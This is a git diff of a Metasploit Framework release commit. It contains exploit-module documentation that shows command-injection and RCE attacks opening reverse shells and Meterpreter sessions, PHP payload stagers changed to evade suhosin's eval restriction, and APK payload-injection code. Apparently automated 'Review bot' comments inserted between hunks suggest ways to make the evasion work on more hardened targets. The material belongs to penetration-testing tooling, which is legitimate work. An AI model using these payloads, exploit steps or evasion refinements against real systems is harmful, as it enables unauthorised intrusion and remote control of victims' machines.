diff --git a/.ruby-version b/.ruby-version index 005119baaa..8e8299dcc0 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -2.4.1 +2.4.2 diff --git a/.travis.yml b/.travis.yml index 28f0b510f7..8cafcfe853 100644 --- a/.travis.yml +++ b/.travis.yml @@ -12,8 +12,8 @@ addons: language: ruby rvm: - '2.2' - - '2.3.4' - - '2.4.1' + - '2.3.5' + - '2.4.2' env: - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"' diff --git a/Dockerfile b/Dockerfile index 141513bdb7..1bf0d1c27c 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,4 +1,4 @@ -FROM ruby:2.4.1-alpine +FROM ruby:2.4.2-alpine MAINTAINER Rapid7 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" diff --git a/Gemfile.lock b/Gemfile.lock index 33e3b69bce..b186ee55ad 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.8) + metasploit-framework (4.16.9) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.7) + metasploit-payloads (= 1.3.8) metasploit_data_models metasploit_payloads-mettle (= 0.2.2) msgpack @@ -150,7 +150,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.7) + metasploit-payloads (1.3.8) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -163,7 +163,7 @@ GEM recog (~> 2.0) metasploit_payloads-mettle (0.2.2) method_source (0.8.2) - mini_portile2 (2.2.0) + mini_portile2 (2.3.0) minitest (5.10.3) msgpack (1.1.0) multipart-post (2.0.0) @@ -171,8 +171,8 @@ GEM net-ssh (4.2.0) network_interface (0.0.2) nexpose (7.0.1) - nokogiri (1.8.0) - mini_portile2 (~> 2.2.0) + nokogiri (1.8.1) + mini_portile2 (~> 2.3.0) octokit (4.7.0) sawyer (~> 0.8.0, >= 0.5.3) openssl-ccm (1.2.1) 
@@ -193,10 +193,9 @@ GEM activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) - pry (0.10.4) + pry (0.11.0) coderay (~> 1.1.0) method_source (~> 0.8.1) - slop (~> 3.4) public_suffix (3.0.0) rack (1.6.8) rack-test (0.6.3) @@ -308,7 +307,6 @@ GEM json (>= 1.8, < 3) simplecov-html (~> 0.10.0) simplecov-html (0.10.2) - slop (3.6.0) sqlite3 (1.3.13) sshkey (1.9.0) thor (0.20.0) diff --git a/documentation/modules/auxiliary/scanner/http/buildmaster_login.md b/documentation/modules/auxiliary/scanner/http/buildmaster_login.md new file mode 100644 index 0000000000..0402f34ef0 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/buildmaster_login.md 
@@ -0,0 +1,59 @@ +## Description + +This module allows you to authenticate to Inedo BuildMaster, an application release automation tool. +The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution. + +## Vulnerable Application + +[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide) + +[Inedo website](http://inedo.com/) + +## Verification Steps + +1. Do: ```use auxiliary/scanner/http/buildmaster_login``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set RPORT [PORT]``` +4. Do: Set credentials +5. Do: ```run``` +6. You should see the module attempting to log in. + +## Scenarios + +### Attempt to login with the default credentials. + +``` +msf > use auxiliary/scanner/http/buildmaster_login +msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39 +RHOSTS => 10.0.0.39 +msf auxiliary(buildmaster_login) > run + +[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1) +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin" +[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin" +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(buildmaster_login) > +``` + +### Brute force with credentials from file. 
+ +``` +msf > use auxiliary/scanner/http/buildmaster_login +msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39 +RHOSTS => 10.0.0.39 +msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt +USERPASS_FILE => ~/BuildMasterCreds.txt +msf auxiliary(buildmaster_login) > run + +[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1) +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test" +[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test" +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong" +[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong" +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin" +[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin" +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(buildmaster_login) > +``` diff --git a/documentation/modules/auxiliary/scanner/smb/smb1.md b/documentation/modules/auxiliary/scanner/smb/smb1.md new file mode 100644 index 0000000000..17c30c3a8a --- /dev/null +++ b/documentation/modules/auxiliary/scanner/smb/smb1.md 
@@ -0,0 +1,55 @@ +# Description +This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects: +```PC NETWORK PROGRAM 1.0 +LANMAN1.0 +Windows for Workgroups 3.1a +LM1.2X002 +LANMAN2.1 +NT LM 0.12 +``` +If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected. +If the SMB server does not support SMBv1 a RST will be sent. + +___ +# Usage + +The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not. + +#### A host that does support SMBv1. + +``` +msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1 +msf auxiliary(smb1) > set RHOSTS x.x.x.x +RHOSTS => x.x.x.x +msf auxiliary(smb1) > run + +[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect. +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(smb1) > services -S x.x.x.x + +Services +======== + +host port proto name state info +---- ---- ----- ---- ----- ---- +x.x.x.x 445 tcp smb1 open +``` + +#### A host that does not support SMBv1 + +``` +msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1 +msf auxiliary(smb1) > set RHOSTS y.y.y.y +RHOSTS => y.y.y.y +msf auxiliary(smb1) > run + +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` +___ + + +## Options + +The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```. \ No newline at end of file diff --git a/documentation/modules/exploit/linux/http/denyall_waf_exec.md b/documentation/modules/exploit/linux/http/denyall_waf_exec.md new file mode 100644 index 0000000000..c41efa6ae1 --- /dev/null +++ b/documentation/modules/exploit/linux/http/denyall_waf_exec.md 
@@ -0,0 +1,47 @@ +## Vulnerable Application + +This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user. + +It's possible to have trial demo for 15 days at Amazon Marketplace. +[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911) + +You just need to follow instruction above URL. + +## Verification Steps + +A successful check of the exploit will look like this: + +- [ ] Start `msfconsole` +- [ ] `use use exploit/linux/http/denyall_exec` +- [ ] Set `RHOST` +- [ ] Set `LHOST` +- [ ] Run `check` +- [ ] **Verify** that you are seeing `The target appears to be vulnerable.` +- [ ] Run `exploit` +- [ ] **Verify** that you are seeing `iToken` value extraction. +- [ ] **Verify** that you are getting `meterpreter` session. + +## Scenarios + +``` +msf > use exploit/linux/http/denyall_exec +msf exploit(denyall_exec) > +msf exploit(denyall_exec) > set RHOST 35.176.123.128 +RHOST => 35.176.123.128 +msf exploit(denyall_exec) > set LHOST 35.12.3.3 +LHOST => 35.12.3.3 +msf exploit(denyall_exec) > check +[*] 35.176.123.128:3001 The target appears to be vulnerable. +msf exploit(denyall_exec) > exploit + +[*] Started reverse TCP handler on 35.12.3.3:4444 +[*] Extracting iToken value from unauthenticated accessible endpoint. +[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a +[*] Trigerring command injection vulnerability with iToken value. +[*] Sending stage (40411 bytes) to 35.176.123.128 +[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300 + +meterpreter > pwd +/var/log/denyall/reverseproxy +meterpreter > +``` \ No newline at end of file 
diff --git a/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md new file mode 100644 index 0000000000..8b63cf55ec --- /dev/null +++ b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md 
@@ -0,0 +1,78 @@ +## Vulnerable Application + + This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2 + + This has been tested with versions 3.2.0 and 3.3.2 + +### Creating A Testing Environment + + At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories. + + 1. ```sudo apt-get install supervisor``` + 2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf` + + ``` + [inet_http_server] ; inet (TCP) server disabled by default + port=:9001 ; ip_address:port specifier, *:port for all iface + username=user ; default is no username (open server) + password=123 ; default is no password (open server) + ``` + + 3. Restart the service: `sudo service supervisor restart` + +## Verification Steps + + 1. ```use exploit/linux/http/supervisor_xmlrpc_exec``` + 2. ```set lhost [IP]``` + 3. ```set rhost [IP]``` + 4. ```set httpusername user``` + 5. ```set httppassword 123``` + 6. ```exploit``` + 7. A meterpreter session should have been opened successfully + +## Options + + **HttpUsername** + + Username for HTTP basic auth which is set in the conf file(optional) + + **HttpPassword** + + Password for HTTP basic auth which is set in the conf file(optional) + + **TARGETURI** + + The path to the XML-RPC endpoint + +## Scenarios + +### Supervisor 3.2.0 on Xubuntu 16.04 + +``` +msf > use exploit/linux/http/supervisor_xmlrpc_exec +msf exploit(supervisor_xmlrpc_exec) > set httpusername user +httpusername => user +msf exploit(supervisor_xmlrpc_exec) > set httppassword 123 +httppassword => 123 +msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2 +lhost => 192.168.0.2 +msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19 +rhost => 192.168.0.19 +msf exploit(supervisor_xmlrpc_exec) > check + +[*] Extracting version from web interface.. +[*] Using basic auth (user:123) +[+] Vulnerable version found: 3.2.0 +[*] 192.168.0.19:9001 The target appears to be vulnerable. 
+msf exploit(supervisor_xmlrpc_exec) > exploit + +[*] Started reverse TCP handler on 192.168.0.2:4444 +[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2 +[*] Using basic auth (user:123) +[*] Sending stage (2878872 bytes) to 192.168.0.19 +[*] Command Stager progress - 100.00% done (782/782 bytes) +[+] Request timeout, usually indicates success. Passing to handler.. +[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100 + +meterpreter > +``` diff --git a/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md b/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md new file mode 100644 index 0000000000..1d699fd6b9 --- /dev/null +++ b/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md 
@@ -0,0 +1,64 @@ +## Vulnerable Application + +Current and historical versions of node (or any JS env based on the +V8 JS engine) have this functionality and could be exploitable if +configured to expose the JS port on an untrusted interface. + +Install a version of node using any of the normal methods: +* Vendor: https://nodejs.org/en/download/package-manager/ +* Distro: `sudo apt-get install nodejs` + +Alternately, use standard node docker containers as targets: +``` +$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858 +``` +(Others at https://hub.docker.com/_/node/) + +Tested on Node 7.x, 6.x, 4.x + +## Verification Steps + +1. Run a node process exposing the debug port +``` +node --debug=0.0.0.0:5858 +``` + +2. Exploit it and catch the callback: + +``` +msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit +``` +(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container) + +Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity +(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start. + + +## Scenarios + +### Example Run (Node 7.x) + +Victim: +``` +$ node --version +v7.10.0 +$ node --debug=0.0.0.0:5858 +(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead. +Debugger listening on 0.0.0.0:5858 +> +(To exit, press ^C again or type .exit) +``` + +Attacker: +``` +msf exploit(nodejs_v8_debugger) > exploit + +[*] Started reverse TCP handler on 10.0.0.141:4444 +[*] 127.0.0.1:5858 - Sending 745 byte payload... 
+[*] 127.0.0.1:5858 - Got success response +[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700 + +id +(redacted) +``` + diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index b0cba5316a..96d0b07868 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.8" + VERSION = "4.16.9" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index 2be86ab444..09c8a97eff 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb 
@@ -3,30 +3,74 @@ require 'shellwords' module Msf -module Sessions -module MeterpreterOptions + module Sessions + # + # Defines common options across all Meterpreter implementations + # + module MeterpreterOptions - def initialize(info = {}) - super(info) + TIMEOUT_SESSION = 24 * 3600 * 7 # 1 week + TIMEOUT_COMMS = 300 # 5 minutes + TIMEOUT_RETRY_TOTAL = 60 * 60 # 1 hour + TIMEOUT_RETRY_WAIT = 10 # 10 seconds - register_advanced_options( - [ - OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]), - OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]), - OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 30]), - OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']), - OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']), - OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]), - OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]), - OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]), - OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]), - OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]), - OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]), - OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 
Rex::Post::Meterpreter::ClientCore::TIMEOUT_COMMS]) - ], self.class) + def initialize(info = {}) + super(info) + + register_advanced_options( + [ + OptBool.new( + 'AutoLoadStdapi', + [true, "Automatically load the Stdapi extension", true] + ), + OptBool.new( + 'AutoVerifySession', + [true, "Automatically verify and drop invalid sessions", true] + ), + OptInt.new( + 'AutoVerifySessionTimeout', + [false, "Timeout period to wait for session validation to occur, in seconds", 30] + ), + OptString.new( + 'InitialAutoRunScript', + [false, "An initial script to run on session creation (before AutoRunScript)", ''] + ), + OptString.new( + 'AutoRunScript', + [false, "A script to run automatically on session creation.", ''] + ), + OptBool.new( + 'AutoSystemInfo', + [true, "Automatically capture system information on initialization.", true] + ), + OptBool.new( + 'EnableUnicodeEncoding', + [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows] + ), + OptPath.new( + 'HandlerSSLCert', + [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"] + ), + OptInt.new( + 'SessionRetryTotal', + [false, "Number of seconds try reconnecting for on network failure", TIMEOUT_RETRY_TOTAL] + ), + OptInt.new( + 'SessionRetryWait', + [false, "Number of seconds to wait between reconnect attempts", TIMEOUT_RETRY_WAIT] + ), + OptInt.new( + 'SessionExpirationTimeout', + [ false, 'The number of seconds before this session should be forcibly shut down', TIMEOUT_SESSION] + ), + OptInt.new( + 'SessionCommunicationTimeout', + [ false, 'The number of seconds of no activity before this session should be killed', TIMEOUT_COMMS] + ) + ], + self.class + ) + end + end end - end -end -end - diff --git a/lib/msf/core/exploit/http/wordpress/helpers.rb b/lib/msf/core/exploit/http/wordpress/helpers.rb index 206b0364c7..f938620420 100644 --- a/lib/msf/core/exploit/http/wordpress/helpers.rb +++ b/lib/msf/core/exploit/http/wordpress/helpers.rb 
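Review bot: The four TIMEOUT_* constants now introduced on MeterpreterOptions carry only trailing unit comments, yet they are the canonical defaults for the SessionExpirationTimeout, SessionCommunicationTimeout, SessionRetryTotal and SessionRetryWait advanced options below, and the same-named constants are removed from Rex::Post::Meterpreter::ClientCore elsewhere in this commit. A header comment above them would make that role explicit, e.g. `# Default values for the session-lifetime advanced options registered below; each can be overridden per session through the datastore.` The option text `Number of seconds try reconnecting for on network failure` is carried over verbatim and still reads awkwardly; `Number of seconds to keep trying to reconnect after a network failure` would be clearer.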
@@ -10,12 +10,12 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param pass [String] Password # @param redirect URL [String] to redirect after successful login # @return [Hash] The post data for vars_post Parameter - def wordpress_helper_login_post_data(user, pass, redirect=nil) + def wordpress_helper_login_post_data(user, pass, redirect = nil) post_data = { - 'log' => user.to_s, - 'pwd' => pass.to_s, - 'redirect_to' => redirect.to_s, - 'wp-submit' => 'Login' + 'log' => user.to_s, + 'pwd' => pass.to_s, + 'redirect_to' => redirect.to_s, + 'wp-submit' => 'Login' } post_data end @@ -31,23 +31,23 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @return [String,nil] The location of the new comment/post, nil on error def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url) vars_post = { - 'comment' => comment, - 'submit' => 'Post+Comment', - 'comment_post_ID' => comment_post_id.to_s, - 'comment_parent' => '0' + 'comment' => comment, + 'submit' => 'Post+Comment', + 'comment_post_ID' => comment_post_id.to_s, + 'comment_parent' => '0' } vars_post.merge!({ - 'author' => author, - 'email' => email, - 'url' => url, + 'author' => author, + 'email' => email, + 'url' => url }) unless login_cookie options = { - 'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'), - 'method' => 'POST' + 'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'), + 'method' => 'POST' } - options.merge!({'vars_post' => vars_post}) - options.merge!({'cookie' => login_cookie}) if login_cookie + options.merge!({ 'vars_post' => vars_post }) + options.merge!({ 'cookie' => login_cookie }) if login_cookie res = send_request_cgi(options) if res && res.redirect? && res.redirection return wordpress_helper_parse_location_header(res) 
@@ -65,7 +65,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found # @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user # @return [Integer,nil] The post id, nil when nothing found - def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil) + def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled = false, login_cookie = nil) range.each { |id| vprint_status("Checking POST ID #{id}...") if (id % 100) == 0 body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie) @@ -81,15 +81,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param comments_enabled [Boolean] Check if comments are enabled on this post # @param login_cookie [String] A valid login cookie to perform the check as an authenticated user # @return [String,nil] the HTTP response body of the post, nil otherwise - def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil) + def wordpress_helper_check_post_id(uri, comments_enabled = false, login_cookie = nil) options = { - 'method' => 'GET', - 'uri' => uri + 'method' => 'GET', + 'uri' => uri } - options.merge!({'cookie' => login_cookie}) if login_cookie + options.merge!({ 'cookie' => login_cookie }) if login_cookie res = send_request_cgi(options) # post exists - if res and res.code == 200 + if res && res.code == 200 # also check if comments are enabled if comments_enabled if res.body =~ /form.*action.*wp-comments-post\.php/ 
@@ -123,8 +123,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # # @param cookie [String] A valid admin session cookie # @return [String,nil] The nonce, nil on error - def wordpress_helper_get_plugin_upload_nonce(cookie) - uri = normalize_uri(wordpress_url_backend, 'plugin-install.php') + def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil) + uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php') options = { 'method' => 'GET', 'uri' => uri, @@ -134,6 +134,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers res = send_request_cgi(options) if res && res.code == 200 return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1] + elsif res && res.redirect? && res.redirection + path = wordpress_helper_parse_location_header(res) + return wordpress_helper_get_plugin_upload_nonce(cookie, path) end end end diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index bb7d04ae8b..cddbee7108 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -41,7 +41,10 @@ class Msf::Payload::Apk application = amanifest.xpath('//application') application_name = application.attribute("name") if application_name - return application_name.to_s + application_str = application_name.to_s + unless application_str == 'android.app.Application' + return application_str + end end activities = amanifest.xpath("//activity|//activity-alias") for activity in activities @@ -221,7 +224,7 @@ class Msf::Payload::Apk FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali") package = amanifest.xpath("//manifest").first['package'] - package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}" + package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}" classes = {} classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize 
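Review bot: The new redirect branch in wordpress_helper_get_plugin_upload_nonce recurses with no depth limit, and if wordpress_helper_parse_location_header returns nil (its caller wordpress_helper_post_comment in this file documents a nil-on-error return) then `path || normalize_uri(...)` re-requests the original redirecting URI, so a bad Location header or a redirect loop recurses until SystemStackError. Bound it with a counter: `def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil, redirects_left = 3)`, `elsif res && res.redirect? && res.redirection && redirects_left > 0 && (path = wordpress_helper_parse_location_header(res))`, `return wordpress_helper_get_plugin_upload_nonce(cookie, path, redirects_left - 1)`. The new `path` parameter is also absent from the YARD header in the first hunk; add `# @param path [String,nil] Absolute path to request instead of plugin-install.php (used when following a redirect)`.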
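Review bot: `package.downcase` is unexplained, and Java package identifiers are case-sensitive, so a reader cannot tell whether this is a correctness fix for the generated smali directory layout or a cosmetic choice; add a comment such as `# lower-case the manifest package so the injected stage's package and smali directory names stay consistent regardless of the manifest's casing — TODO confirm this matches how the smali is emitted`. Note that `first['package']` yields nil when the manifest lacks a package attribute; that predated this change, but `.downcase` now raises NoMethodError one step earlier than the old `nil + "..."`, so a `raise RuntimeError, 'AndroidManifest.xml has no package attribute' unless package` would give a clearer failure.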
diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb
index cc7fbc7b02..d630bf749e 100644
--- a/lib/msf/core/payload/linux/bind_tcp.rb
+++ b/lib/msf/core/payload/linux/bind_tcp.rb
@@ -31,7 +31,7 @@ module Payload::Linux::BindTcp
 # Generate the more advanced stager if we have the space
 if self.available_space && required_space <= self.available_space
- conf[:exitfunk] = datastore['EXITFUNC'],
+ conf[:exitfunk] = datastore['EXITFUNC']
 conf[:reliable] = true
 end
diff --git a/lib/msf/core/payload/php/bind_tcp.rb b/lib/msf/core/payload/php/bind_tcp.rb
index 4756ce810d..7dac6fe441 100644
--- a/lib/msf/core/payload/php/bind_tcp.rb
+++ b/lib/msf/core/payload/php/bind_tcp.rb
@@ -109,7 +109,15 @@ while (strlen($b) < $len) {
 # Set up the socket for the main stage to use.
 $GLOBALS['msgsock'] = $s;
 $GLOBALS['msgsock_type'] = $s_type;
-eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
+{
+ $suhosin_bypass=create_function('', $b);
+ $suhosin_bypass();
+}
+else
+{
+ eval($b);
+}
 die();^
 end
diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb
index aa480610c6..5cc7daae8c 100644
--- a/lib/msf/core/payload/php/reverse_tcp.rb
+++ b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -102,7 +102,15 @@ while (strlen($b) < $len) {
 # Set up the socket for the main stage to use.
 $GLOBALS['msgsock'] = $s;
 $GLOBALS['msgsock_type'] = $s_type;
-eval($b);
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
+{
+ $suhosin_bypass=create_function('', $b);
+ $suhosin_bypass();
+}
+else
+{
+ eval($b);
+}
 die();^
 end
diff --git a/lib/msf/core/payload/windows/bind_tcp.rb b/lib/msf/core/payload/windows/bind_tcp.rb
index 63b9a5d651..8945ded6bb 100644
--- a/lib/msf/core/payload/windows/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/bind_tcp.rb
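Review bot: The removed trailing comma had turned `conf[:exitfunk]` into a one-element Array, and the identical one-character fix is repeated in the three Windows bind_tcp mixins in this commit, but no spec pins the corrected value, so the next copy-paste can regress it silently; an assertion in the payload specs such as `expect(conf[:exitfunk]).to eq(datastore['EXITFUNC'])` would catch it. Since all four mixins carry this exact block, hoisting it into a shared helper that returns the advanced-stager `conf` would remove the duplication. The enclosing method starts and ends outside this hunk.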
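Review bot: The new suhosin branch calls `create_function` unconditionally, but hardened PHP installs commonly disable it via `disable_functions` (and it is deprecated from PHP 7.2 and removed in PHP 8 — verify against the targets you support), in which case `$suhosin_bypass` is not callable and the stage dies instead of falling through to `eval`; guard it with `if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval') && function_exists('create_function'))`. Whether `create_function` actually escapes `suhosin.executor.disable_eval` depends on the suhosin build, so a comment naming the PHP/suhosin versions this was verified on would help the next person who touches it. `ini_get` returns a string, so `"0"` and `""` are both falsy here, which is fine, but `"off"` would be truthy; `filter_var(ini_get(...), FILTER_VALIDATE_BOOLEAN)` is the robust form.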
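Review bot: This suhosin dispatch block is byte-identical to the one added to php/bind_tcp.rb in the same commit, so the eval fallback now lives in two heredoc templates that must be kept in sync; emit it from one helper on the shared PHP payload mixin (e.g. a `php_exec_stage_snippet` returning the if/else text) and interpolate it into both templates. The same `function_exists('create_function')` guard is needed here as in bind_tcp, since a target with `create_function` in `disable_functions` otherwise dies before `eval` is reached.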
@@ -35,7 +35,7 @@ module Payload::Windows::BindTcp
 # Generate the more advanced stager if we have the space
 if self.available_space && required_space <= self.available_space
- conf[:exitfunk] = datastore['EXITFUNC'],
+ conf[:exitfunk] = datastore['EXITFUNC']
 conf[:reliable] = true
 end
diff --git a/lib/msf/core/payload/windows/bind_tcp_rc4.rb b/lib/msf/core/payload/windows/bind_tcp_rc4.rb
index d8cdbddb97..37657ddc8a 100644
--- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb
@@ -33,7 +33,7 @@ module Payload::Windows::BindTcpRc4
 # Generate the more advanced stager if we have the space
 if self.available_space && required_space <= self.available_space
- conf[:exitfunk] = datastore['EXITFUNC'],
+ conf[:exitfunk] = datastore['EXITFUNC']
 conf[:reliable] = true
 end
diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb
index 46f7c0b744..f55de65339 100644
--- a/lib/msf/core/payload/windows/x64/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb
@@ -33,7 +33,7 @@ module Payload::Windows::BindTcp_x64
 # Generate the more advanced stager if we have the space
 if self.available_space && required_space <= self.available_space
- conf[:exitfunk] = datastore['EXITFUNC'],
+ conf[:exitfunk] = datastore['EXITFUNC']
 conf[:reliable] = true
 end
diff --git a/lib/msf/core/post/unix.rb b/lib/msf/core/post/unix.rb
index b09425f198..37637f147e 100644
--- a/lib/msf/core/post/unix.rb
+++ b/lib/msf/core/post/unix.rb
@@ -40,14 +40,17 @@ module Msf::Post::Unix
 #
 def get_groups
 groups = []
- cmd_out = read_file("/etc/group").split("\n")
- cmd_out.each do |l|
- entry = {}
- user_field = l.split(":")
- entry[:name] = user_field[0]
- entry[:gid] = user_field[2]
- entry[:users] = user_field[3]
- groups << entry
+ group = '/etc/group'
+ if file_exist?(group)
+ cmd_out = read_file(group).split("\n")
+ cmd_out.each do |l|
+ entry = {}
+ user_field = l.split(":")
